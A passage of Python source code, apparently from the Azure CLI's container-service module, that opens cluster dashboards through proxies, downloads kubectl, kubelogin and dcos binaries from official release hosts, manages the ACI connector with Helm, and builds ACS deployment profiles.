time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def _unzip(src, dest):
logger.debug('Extracting %s to %s.', src, dest)
system = platform.system()
if system in ('Linux', 'Darwin', 'Windows'):
import zipfile
with zipfile.ZipFile(src, 'r') as zipObj:
zipObj.extractall(dest)
else:
raise CLIError('The current system is not supported.')
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None,
kubelogin_version='latest', kubelogin_install_location=None):
k8s_install_kubectl(cmd, client_version, install_location)
k8s_install_kubelogin(cmd, kubelogin_version, kubelogin_install_location)
def k8s_install_kubectl(cmd, client_version='latest', install_location=None):
"""
Install kubectl, a command-line interface for Kubernetes clusters.
"""
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None):
"""
Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.
"""
source_url = 'https://github.com/Azure/kubelogin/releases/download'
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
if client_version == 'latest':
context = _ssl_context()
latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
if cloud_name.lower() == 'azurechinacloud':
latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
latest_release = urlopen(latest_release_url, context=context).read()
client_version = json.loads(latest_release)['tag_name'].strip()
else:
client_version = "v%s" % client_version
base_url = source_url + '/{}/kubelogin.zip'
file_url = base_url.format(client_version)
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
system = platform.system()
if system == 'Windows':
sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
elif system == 'Linux':
# TODO: Support ARM CPU here
sub_dir, binary_name = 'linux_amd64', 'kubelogin'
elif system == 'Darwin':
sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
with tempfile.TemporaryDirectory() as tmp_dir:
try:
download_path = os.path.join(tmp_dir, 'kubelogin.zip')
logger.warning('Downloading client to "%s" from "%s"', download_path, file_url)
_urlretrieve(file_url, download_path)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
_unzip(download_path, tmp_dir)
download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
shutil.move(download_path, install_location)
os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group):
from subprocess import PIPE, Popen
instance = client.get(resource_group_name, name)
helm_not_installed = 'Helm not detected, please verify if it is installed.'
url_chart = chart_url
if image_tag is None:
image_tag = 'latest'
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# If SPN is specified, the secret should also be specified
if service_principal is not None and client_secret is None:
raise CLIError('--client-secret must be specified when --service-principal is specified')
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
# Validate the location upon the ACI avaiable regions
_validate_aci_location(norm_location)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
subscription_id = get_subscription_id(cmd.cli_ctx)
# Get the TenantID
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, tenant_id = profile.get_login_credentials()
# Check if we want the linux connector
if os_type.lower() in ['linux', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Linux', instance.enable_rbac, instance.fqdn)
# Check if we want the windows connector
if os_type.lower() in ['windows', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Windows', instance.enable_rbac, instance.fqdn)
def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, os_type, use_rbac, masterFqdn):
rbac_install = "true" if use_rbac else "false"
node_taint = 'azure.com/aci'
helm_release_name = connector_name.lower() + '-' + os_type.lower() + '-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
k8s_master = 'https://{}'.format(masterFqdn)
logger.warning("Deploying the ACI connector for '%s' using Helm", os_type)
try:
values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format(
node_name, node_taint, os_type, image_tag, rbac_install)
if service_principal:
values += ",env.azureClientId=" + service_principal
if client_secret:
values += ",env.azureClientKey=" + client_secret
if subscription_id:
values += ",env.azureSubscriptionId=" + subscription_id
if tenant_id:
values += ",env.azureTenantId=" + tenant_id
if aci_resource_group:
values += ",env.aciResourceGroup=" + aci_resource_group
if norm_location:
values += ",env.aciRegion=" + norm_location
# Currently, we need to set the master FQDN.
# This is temporary and we should remove it when possible
values += ",env.masterUri=" + k8s_master
if helm_cmd == "install":
subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values])
elif helm_cmd == "upgrade":
subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values])
except subprocess.CalledProcessError as err:
raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err))
def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, graceful=False, os_type='Linux'):
from subprocess import PIPE, Popen
helm_not_installed = "Error : Helm not detected, please verify if it is installed."
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
if os_type.lower() in ['linux', 'both']:
helm_release_name = connector_name.lower() + '-linux-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
if os_type.lower() in ['windows', 'both']:
helm_release_name = connector_name.lower() + '-windows-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
def _undeploy_connector(graceful, node_name, helm_release_name):
if graceful:
logger.warning('Graceful option selected, will try to drain the node first')
from subprocess import PIPE, Popen
kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.'
try:
Popen(["kubectl"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(kubectl_not_installed)
try:
drain_node = subprocess.check_output(
['kubectl', 'drain', node_name, '--force', '--delete-local-data'],
universal_newlines=True)
if not drain_node:
raise CLIError('Could not find the node, make sure you' +
' are using the correct --os-type')
except subprocess.CalledProcessError as err:
raise CLIError('Could not find the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
logger.warning("Undeploying the '%s' using Helm", helm_release_name)
try:
subprocess.call(['helm', 'del', helm_release_name, '--purge'])
except subprocess.CalledProcessError as err:
raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err))
try:
subprocess.check_output(
['kubectl', 'delete', 'node', node_name],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not delete the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
